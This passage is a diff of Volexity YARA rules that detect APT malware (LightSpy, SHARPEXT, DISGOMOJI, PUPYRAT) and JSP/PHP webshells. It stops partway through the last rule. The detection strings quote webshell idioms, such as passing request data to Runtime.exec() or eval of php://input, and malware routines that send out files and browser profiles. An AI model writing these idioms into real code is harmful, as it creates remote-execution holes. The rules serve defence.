-rule VOLEXITY_Apt_Malware_Win_Lightspy_Orchestrator_Decoded_C2_Strings : BRAZENBAMBOO FILE MEMORY
-{
-	meta:
-		description = "Detects the decoded orchestrator for the Windows variant of the LightSpy malware family. This file is normally stored in an encoded state on the C2 server and is used as the core component of this malware family, loading additional plugins from the C2 whilst managing all the C2 communication etc."
-		author = "threatintel@volexity.com"
-		id = "a0af8fb7-13a3-54e8-8569-e8622fa80d89"
-		date = "2024-02-15"
-		modified = "2024-11-14"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-11-15 BrazenBamboo/rules.yar#L288-L337"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "eeaaf6e16d4854a2279bd62596f75cb8b8ec1b05f3b050f5dac97254704b9005"
-		score = 75
-		quality = 78
-		tags = "BRAZENBAMBOO, FILE, MEMORY"
-		hash1 = "80c0cdb1db961c76de7e4efb6aced8a52cd0e34178660ef34c128be5f0d587df"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10245
-		version = 4
-
-	strings:
-		$s1 = "[WsClient][Error]:"
-		$s2 = "[WsClient][Info]:"
-		$s3 = "[WsClient]:WsClient"
-		$s4 = "[WsClient][Info]:Ws"
-		$s5 = "WsClient Worker Thread ID=%d"
-		$s6 = "[LightWebClient]:"
-		$s7 = "LightHttpGet err:%s"
-		$s8 = "User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36"
-		$s9 = "KvList Err:%s"
-		$s10 = "dataMultiPart malloc err:%d"
-		$ctrl1 = "CTRL_HEART_BEAT"
-		$ctrl2 = "CTRL_NET_CONFIG"
-		$ctrl3 = "CTRL_COMMAND_PLAN"
-		$ctrl4 = "CTRL_MODIFY_NET_CONFIG"
-		$ctrl5 = "CTRL_UPLOAD_PLUGIN_STATUS"
-		$ctrl6 = "CTRL_PLUGIN_EXECUTE_COMMAND"
-		$ctrl7 = "CTRL_PLUGIN_COMMAND_STATUS"
-		$ctrl8 = "CTRL_PLUGIN_STOP_COMMAND"
-		$ctrl9 = "CTRL_GET_SLEEP_CONFIG"
-		$ctrl10 = "CTRL_MODIFY_SLEEP_CONFIG"
-		$ctrl11 = "CTRL_SLEEP_STATUS"
-		$ctrl12 = "CTRL_UPDATE_PLUGIN"
-		$ctrl13 = "CTRL_DESTROY"
-		$ctrl14 = "CTRL_RECONFIG_REBOUNT_ADDRESS"
-		$ctrl15 = "CTRL_AUTO_UPLOUD_FILE_CONFIG"
-		$ctrl16 = "CTRL_UPLOUD_DEVICE_INFO"
-		$ctrl17 = "CTRL_TEST_VPDN_ACCOUNT"
-
-	condition:
-		3 of ( $s* ) or 5 of ( $ctrl* )
-}
-rule VOLEXITY_Apt_Malware_Js_Sharpext : SHARPPINE FILE MEMORY
-{
-	meta:
-		description = "A malicious Chrome browser extension used by the SharpPine threat actor to steal Gmail data from a victim."
-		author = "threatintel@volexity.com"
-		id = "61b5176a-ff73-5fce-bc70-c9e09bb5afed"
-		date = "2021-09-14"
-		modified = "2025-05-21"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-07-28 SharpTongue SharpTongue Deploys Clever Mail-Stealing Browser Extension SHARPEXT/yara.yar#L1-L52"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "0ed58c8646582ee36aeac650fac02d1e4962d45c0f6a24783c021d9267bed192"
-		score = 75
-		quality = 80
-		tags = "SHARPPINE, FILE, MEMORY"
-		hash1 = "1c9664513fe226beb53268b58b11dacc35b80a12c50c22b76382304badf4eb00"
-		hash2 = "6025c66c2eaae30c0349731beb8a95f8a5ba1180c5481e9a49d474f4e1bb76a4"
-		hash3 = "6594b75939bcdab4253172f0fa9066c8aee2fa4911bd5a03421aeb7edcd9c90c"
-		os = "all"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 5916
-		version = 5
-
-	strings:
-		$s1 = "\"mode=attach&name=\"" ascii
-		$s2 = "\"mode=new&mid=\"" ascii
-		$s3 = "\"mode=attlist\"" ascii
-		$s4 = "\"mode=list\"" ascii
-		$s5 = "\"mode=domain\"" ascii
-		$s6 = "\"mode=black\"" ascii
-		$s7 = "\"mode=newD&d=\"" ascii
-		$mark1 = "chrome.runtime.onMessage.addListener" ascii
-		$mark2 = "chrome.webNavigation.onCompleted.addListener" ascii
-		$enc1 = "function BSue(string){" ascii
-		$enc2 = "function BSE(input){" ascii
-		$enc3 = "function bin2hex(byteArray)" ascii
-		$xhr1 = ".send(\"mode=cd1" ascii
-		$xhr2 = ".send(\"mode=black" ascii
-		$xhr3 = ".send(\"mode=domain" ascii
-		$xhr4 = ".send(\"mode=list" ascii
-		$manifest1 = "\"description\":\"advanced font\"," ascii
-		$manifest2 = "\"scripts\":[\"bg.js\"]" ascii
-		$manifest3 = "\"devtools_page\":\"dev.html\"" ascii
-
-	condition:
-		(5 of ( $s* ) and all of ( $mark* ) ) or all of ( $enc* ) or 3 of ( $xhr* ) or 2 of ( $manifest* )
-}
-rule VOLEXITY_Webshell_Jsp_Godzilla : FILE MEMORY
-{
-	meta:
-		description = "Detects the JSP implementation of the Godzilla Webshell."
-		author = "threatintel@volexity.com"
-		id = "47c8eab8-84d7-5566-b757-5a6dcc7579b7"
-		date = "2021-11-08"
-		modified = "2024-07-30"
-		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L1-L34"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "52cba9545f662da18ca6e07340d7a9be637b89e7ed702dd58cac545c702a00e3"
-		score = 75
-		quality = 55
-		tags = "FILE, MEMORY"
-		hash1 = "2786d2dc738529a34ecde10ffeda69b7f40762bf13e7771451f13a24ab7fc5fe"
-		os = "win,linux"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6100
-		version = 6
-
-	strings:
-		$s1 = ".getWriter().write(base64Encode(" wide ascii
-		$s2 = ".getAttribute(" ascii wide
-		$s3 = "java.security.MessageDigest" ascii wide
-		$auth1 = /String xc=\"[a-f0-9]{16}\"/ ascii wide
-		$auth2 = "String pass=\"" ascii wide
-		$magic = "class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q"
-		$magic2 = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class"
-
-	condition:
-		all of ( $s* ) or all of ( $auth* ) or any of ( $magic* )
-}
-rule VOLEXITY_Susp_Jsp_General_Runtime_Exec_Req : FILE MEMORY
-{
-	meta:
-		description = "Looks for a common design pattern in webshells where a request attribute is passed as an argument to exec()."
-		author = "threatintel@volexity.com"
-		id = "7f1539bd-a2f0-50dd-b500-ada4e0971d13"
-		date = "2022-02-02"
-		modified = "2024-07-30"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L35-L56"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "d3048aba80c1c39f1673931cd2d7c5ed83045603b0ad204073fd788d0103a6c8"
-		score = 65
-		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "4935f0c50057e28efa7376c734a4c66018f8d20157b6584399146b6c79a6de15"
-		os = "win,linux"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "high"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6450
-		version = 3
-
-	strings:
-		$s1 = "Runtime.getRuntime().exec(request." ascii
-
-	condition:
-		$s1
-}
-rule VOLEXITY_Webshell_Jsp_Regeorg : FILE MEMORY
-{
-	meta:
-		description = "Detects the reGeorg webshells' JSP version."
-		author = "threatintel@volexity.com"
-		id = "205ee383-4298-5469-a509-4ce3eaf9dd0e"
-		date = "2022-03-08"
-		modified = "2024-09-20"
-		reference = "https://github.com/SecWiki/WebShell-2/blob/master/reGeorg-master/tunnel.jsp"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L57-L86"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "cecb71605d9112d509823c26e40e1cf9cd6db581db448db5c9ffc63a2bfe529e"
-		score = 75
-		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "f9b20324f4239a8c82042d8207e35776d6777b6305974964cd9ccc09d431b845"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6575
-		version = 5
-
-	strings:
-		$magic = "socketChannel.connect(new InetSocketAddress(target, port))" ascii
-		$a1 = ".connect(new InetSocketAddress" ascii
-		$a2 = ".configureBlocking(false)" ascii
-		$a3 = ".setHeader(" ascii
-		$a4 = ".getHeader(" ascii
-		$a5 = ".flip();" ascii
+		$cpp2 = "src/test_catch_dns.cpp"
 
 	condition:
-		$magic or all of ( $a* )
+		9 of ( $os* ) or 3 of ( $msg* ) or all of ( $conf* ) or all of ( $netw* ) or $apache or all of ( $cpp* )
 }
-rule VOLEXITY_Webshell_Jsp_Converge : FILE MEMORY CVE_2022_26134
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Modules : TRANSPARENTJASMINE FILE MEMORY
 {
 	meta:
-		description = "Detects CONVERGE - a file upload webshell observed in incident involving compromise of Confluence server via CVE-2022-26134."
+		description = "Detects DISGOMOJI modules using strings in the ELF."
 		author = "threatintel@volexity.com"
-		id = "2a74678e-cb00-567c-a2e0-2e095f3e5ee8"
-		date = "2022-06-01"
-		modified = "2024-09-20"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L1-L21"
+		id = "b9e4ecdc-9b02-546f-9b79-947cb6b1f99a"
+		date = "2024-02-22"
+		modified = "2024-07-05"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L1-L24"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "bb48516342eddd48c35e6db0eb74f95e116dc723503552b99ba721b5bdb391e5"
+		logic_hash = "7880288e3230b688b780bdfbac2b0761fd7831b7df233672c2242c21a86e1297"
 		score = 75
 		quality = 80
-		tags = "FILE, MEMORY, CVE-2022-26134"
-		os = "all"
+		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
+		hash1 = "2abaae4f6794131108adf5b42e09ee5ce24769431a0e154feabe6052cfe70bf3"
+		os = "linux"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6788
-		version = 5
+		rule_id = 10270
+		version = 6
 
 	strings:
-		$s1 = "if (request.getParameter(\"name\")!=null && request.getParameter(\"name\").length()!=0){" ascii
+		$s1 = "discord-c2/test/main/finalizing/Deliveries/ob_Delivery.go" wide ascii
+		$s2 = "discord-c2/test/main/finalizing/WAN_Conf.go" wide ascii
 
 	condition:
-		$s1
+		any of them
 }
-rule VOLEXITY_Webshell_Java_Realcmd : FILE MEMORY
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Loader : TRANSPARENTJASMINE FILE MEMORY
 {
 	meta:
-		description = "Detects the RealCMD webshell, one of the payloads for BEHINDER."
+		description = "Detects DISGOMOJI loader using strings in the ELF."
 		author = "threatintel@volexity.com"
-		id = "60b30ccc-bcfa-51e6-a3f5-88037d19213e"
-		date = "2022-06-01"
-		modified = "2024-07-30"
-		reference = "https://github.com/Freakboy/Behinder/blob/master/src/main/java/vip/youwe/sheller/payload/java/RealCMD.java"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L61-L84"
+		id = "6d7848db-f1a5-5ccc-977a-7597b966a31c"
+		date = "2024-02-22"
+		modified = "2024-07-05"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L25-L47"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "e09f2a23674fd73296dd4d1fabf1a2c812bfe69ff02abc96a4be35af6a18e512"
+		logic_hash = "d9be4846bab5fffcfd60eaec377443819404f30ec088905c2ee26bd3b7525832"
 		score = 75
 		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "a9a30455d6f3a0a8cd0274ae954aa41674b6fd52877fafc84a9cb833fd8858f6"
-		os = "all"
+		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
+		hash1 = "51a372fee89f885741515fa6fdf0ebce860f98145c9883f2e3e35c0fe4432885"
+		os = "linux"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6786
-		version = 4
+		rule_id = 10269
+		version = 7
 
 	strings:
-		$fn1 = "runCmd" wide ascii fullword
-		$fn2 = "RealCMD" ascii wide fullword
-		$fn3 = "buildJson" ascii wide fullword
+		$s1 = "discord-c2/test/main/delievery.go" wide ascii
 
 	condition:
-		all of ( $fn* )
+		$s1
 }
-rule VOLEXITY_Apt_Malware_Win_Gimmick_Dotnet_Base : STORMBAMBOO FILE MEMORY
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Debug_String : TRANSPARENTJASMINE FILE MEMORY
 {
 	meta:
-		description = "Detects the base version of GIMMICK written in .NET."
+		description = "Detects DISGOMOJI using strings in the ELF."
 		author = "threatintel@volexity.com"
-		id = "be42d85f-3143-51d3-b148-95d0ae666771"
-		date = "2020-03-16"
-		modified = "2024-08-19"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-03-22 GIMMICK/indicators/yara.yar#L60-L86"
+		id = "eed2468f-7e50-5f3e-946a-277c10984823"
+		date = "2024-02-22"
+		modified = "2024-11-27"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L48-L71"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "39a38ea189d5e840f9334cb7ec8f390444139b39c6f426906a8845f9a1ada9f7"
+		logic_hash = "6bb130eead39bd8128983e0f2e76cfeff8865ce8ed3cb73b132ed32d68fc0db0"
 		score = 75
 		quality = 80
-		tags = "STORMBAMBOO, FILE, MEMORY"
-		hash1 = "b554bfe4c2da7d0ac42d1b4f28f4aae854331fd6d2b3af22af961f6919740234"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6628
-		version = 3
-
-	strings:
-		$other1 = "srcStr is null" wide
-		$other2 = "srcBs is null " wide
-		$other3 = "Key cannot be null" wide
-		$other4 = "Faild to get target constructor, targetType=" wide
-		$other5 = "hexMoudule(public key) cannot be null or empty." wide
-		$other6 = "https://oauth2.googleapis.com/token" wide
-
-	condition:
-		5 of ( $other* )
-}
-rule VOLEXITY_Webshell_Java_Behinder_Shellservice : FILE MEMORY
-{
-	meta:
-		description = "Looks for artifacts generated (generally seen in .class files) related to the Behinder webshell."
-		author = "threatintel@volexity.com"
-		id = "21c1e3e9-d048-5c60-9c21-8e54b27f359a"
-		date = "2022-03-18"
-		modified = "2024-07-30"
-		reference = "https://github.com/MountCloud/BehinderClientSource/blob/master/src/main/java/net/rebeyond/behinder/core/ShellService.java"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L1-L29"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "373a8d4ef81e9bbbf1f24ebf0389e7da4b73f88786cc8e1d286ccc9f4c36debc"
-		score = 75
-		quality = 30
-		tags = "FILE, MEMORY"
-		hash1 = "9a9882f9082a506ed0fc4ddaedd50570c5762deadcaf789ac81ecdbb8cf6eff2"
-		os = "win,linux"
+		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
+		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
+		os = "linux"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6615
-		version = 3
+		rule_id = 10268
+		version = 9
 
 	strings:
-		$s1 = "CONNECT" ascii fullword
-		$s2 = "DISCONNECT" ascii fullword
-		$s3 = "socket_" ascii fullword
-		$s4 = "targetIP" ascii fullword
-		$s5 = "targetPort" ascii fullword
-		$s6 = "socketHash" ascii fullword
-		$s7 = "extraData" ascii fullword
+		$s1 = "discord-c2/test/main/payload.go" wide ascii
+		$s2 = "Desktop/Golang_Dev/Discord"
 
 	condition:
-		all of them
+		any of them
 }
-rule VOLEXITY_Malware_Golang_Pantegana : FILE MEMORY
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_2 : TRANSPARENTJASMINE FILE MEMORY
 {
 	meta:
-		description = "Detects PANTEGANA, a Golang backdoor used by a range of threat actors due to its public availability."
+		description = "Detects DISGOMOJI malware using strings in the ELF."
 		author = "threatintel@volexity.com"
-		id = "b6154165-68e0-5986-a0cf-5631d369c230"
-		date = "2022-03-30"
-		modified = "2025-03-21"
-		reference = "https://github.com/elleven11/pantegana"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L90-L120"
+		id = "609beb47-5e93-5f69-b89d-2cf62f20851a"
+		date = "2024-02-22"
+		modified = "2024-07-05"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L72-L103"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "791a664a6b4b98051cbfacb451099de085cbab74d73771709377ab68a5a23d2b"
+		logic_hash = "e03a774cca2946c1becdbd775ef465033dae089d578ea18a4f43fd7bdae9168e"
 		score = 75
 		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "8297c99391aae918f154077c61ea94a99c7a339166e7981d9912b7fdc2e0d4f0"
-		os = "all"
+		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
+		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
+		os = "linux"
 		os_arch = "all"
 		scan_context = "file,memory"
-		severity = "high"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6631
-		version = 3
+		rule_id = 10266
+		version = 9
 
 	strings:
-		$s1 = "RunFingerprinter" ascii
-		$s2 = "SendSysInfo" ascii
-		$s3 = "ExecAndGetOutput" ascii
-		$s4 = "RequestCommand" ascii
-		$s5 = "bindataRead" ascii
-		$s6 = "RunClient" ascii
-		$magic = "github.com/elleven11/pantegana" ascii
+		$s1 = "downloadFileFromURL" wide ascii
+		$s2 = "createCronJob" wide ascii
+		$s3 = "findAndSendFiles" wide ascii
+		$s4 = "updateLogFile" wide ascii
+		$s5 = "handleZipFile" wide ascii
+		$s6 = "takeScreenshot" wide ascii
+		$s7 = "zipFirefoxProfile" wide ascii
+		$s8 = "zipDirectoryWithParts" wide ascii
+		$s9 = "uploadAndSendToOshi" wide ascii
+		$s10 = "uploadAndSendToLeft" wide ascii
 
 	condition:
-		5 of ( $s* ) or $magic
+		7 of them
 }
-rule VOLEXITY_Malware_Any_Pupyrat_B : FILE MEMORY
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_1 : TRANSPARENTJASMINE FILE MEMORY
 {
 	meta:
-		description = "Detects the PUPYRAT malware family, a cross-platform RAT written in Python."
+		description = "Detects GOMOJI malware using strings in the ELF."
 		author = "threatintel@volexity.com"
-		id = "ec8d0448-f47d-5c6e-bcf9-8f40ae83a96f"
-		date = "2022-04-07"
-		modified = "2025-03-21"
-		reference = "https://github.com/n1nj4sec/pupy"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L121-L158"
+		id = "f6643e9a-ca41-57e0-9fce-571d340f1cfe"
+		date = "2024-02-22"
+		modified = "2024-07-05"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L104-L131"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "f5b5f35ee783ff1163072591c6d48a85894729156935650a0fd166ae22a2ea00"
+		logic_hash = "dd3535079881ae9cfe25c129803668cb595be89b7f62eb82af19cc3839f92b6d"
 		score = 75
 		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "7474a6008b99e45686678f216af7d6357bb70a054c6d9b05e1817c8d80d536b4"
-		os = "all"
+		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
+		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
+		os = "linux"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6689
-		version = 4
+		rule_id = 10265
+		version = 7
 
 	strings:
-		$elf1 = "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null" ascii
-		$elf2 = "reflective_inject_dll" fullword ascii
-		$elf3 = "ld_preload_inject_dll" fullword ascii
-		$pupy1 = "_pupy.error" ascii
-		$pupy2 = "pupy://" ascii
-		$s1 = "Args not passed" ascii
-		$s2 = "Too many args" ascii
-		$s3 = "Can't execute" ascii
-		$s4 = "mexec:stdin" ascii
-		$s5 = "mexec:stdout" ascii
-		$s6 = "mexec:stderr" ascii
-		$s7 = "LZMA error" ascii
+		$s1 = "Session *%s* opened!" wide ascii
+		$s2 = "uevent_seqnum.sh" wide ascii
+		$s3 = "Error downloading shell script: %v" wide ascii
+		$s4 = "Error setting execute permissions: %v" wide ascii
+		$s5 = "Error executing shell script: %v" wide ascii
+		$s6 = "Error creating Discord session" wide ascii
 
 	condition:
-		any of ( $elf* ) or all of ( $pupy* ) or all of ( $s* )
+		4 of them
 }
-rule VOLEXITY_Susp_Php_Fileinput_Eval : FILE
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Bogus_Strings : TRANSPARENTJASMINE FILE
 {
 	meta:
-		description = "Rule designed to detect PHP files which use file_get_contents() and then shortly afterwards use an eval statement."
+		description = "Detects the DISGOMOJI malware using bogus strings introduced in the newer version."
 		author = "threatintel@volexity.com"
-		id = "3e311677-22ea-5e5f-bdc6-dd67033d25a6"
-		date = "2021-06-16"
-		modified = "2024-12-12"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L159-L182"
+		id = "ecff8d3c-d4fe-5b6d-a227-6ff531cf8e2b"
+		date = "2024-03-14"
+		modified = "2024-07-05"
+		reference = "TIB-20240318"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L132-L159"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "de376bfdfa5b6244c414454cb5d43d29e3dd75e049389f0c430c160f9d198965"
-		score = 65
+		logic_hash = "0d8a2b371ffb182e60a8cc0cc500d1a9f906718a55f23f35f6c12f7faabbe971"
+		score = 75
 		quality = 80
-		tags = "FILE"
-		hash1 = "1a34c43611ee310c16acc383c10a7b8b41578c19ee85716b14ac5adbf0a13bd5"
-		hash2 = "6e8874c756c009c63f715a44ca72d0cb31dc25d87d7df6ca2830fe8330580342"
-		os = "win,linux"
+		tags = "TRANSPARENTJASMINE, FILE"
+		hash1 = "8c8ef2d850bd9c987604e82571706e11612946122c6ab089bd54440c0113968e"
+		os = "linux"
 		os_arch = "all"
 		scan_context = "file"
-		severity = "high"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 5581
+		rule_id = 10341
 		version = 5
 
 	strings:
-		$s1 = "file_get_contents(\"php://input\")"
-		$s2 = "eval("
+		$s1 = "Graphics Display Rendering" wide ascii
+		$s2 = "Error fetching Repository Key: %v" wide ascii
+		$s3 = "Error reading Repository Key: %v" wide ascii
+		$s4 = "Error fetching dpkg: %v" wide ascii
+		$s5 = "GNU Drivers Latest version v1.4.2" wide ascii
+		$s6 = "ps_output.txt" wide ascii
 
 	condition:
-		$s2 in ( @s1 [ 1 ] .. ( @s1 [ 1 ] + 512 ) )
+		all of them
 }
-rule VOLEXITY_Susp_Php_Call_User_Func : FILE
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Script_Uevent_Seqnum : TRANSPARENTJASMINE FILE
 {
 	meta:
-		description = "Webshells using call_user_func() function against an object from a file input or POST variable."
+		description = "Detects a script deployed as part of DISGOMOJI malware chain."
 		author = "threatintel@volexity.com"
-		id = "48c7857e-7dda-5e3f-b82c-7d34c251f083"
-		date = "2021-06-16"
-		modified = "2024-07-30"
-		reference = "https://zhuanlan.zhihu.com/p/354906657"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L183-L205"
+		id = "9df61164-6a92-5042-ba4f-64dc7e998283"
+		date = "2024-03-07"
+		modified = "2024-07-05"
+		reference = "TIB-20240318"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L160-L187"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "46c999da97682023861e58f9cd2c8651480db990a0361c1985c6d5c35b5bf0ea"
-		score = 65
+		logic_hash = "e390e83d9fc15499c9f32ad47d1c526273105602bda7b3532720b0a3f6abc835"
+		score = 75
 		quality = 80
-		tags = "FILE"
-		hash1 = "40b053a2f3c8f47d252b960a9807b030b463ef793228b1670eda89f07b55b252"
-		os = "win,linux"
+		tags = "TRANSPARENTJASMINE, FILE"
+		hash1 = "98b24fb7aaaece7556aea2269b4e908dd79ff332ddaa5111caec49123840f364"
+		os = "linux"
 		os_arch = "all"
 		scan_context = "file"
-		severity = "high"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 5582
-		version = 4
+		rule_id = 10314
+		version = 6
 
 	strings:
-		$s1 = "@call_user_func(new C()" wide ascii
+		$s1 = "USB_DIR=\"/media/$USER\"" wide ascii
+		$s2 = "RECORD_FILE=\"record.txt\"" wide ascii
+		$s3 = "copy_files()" wide ascii
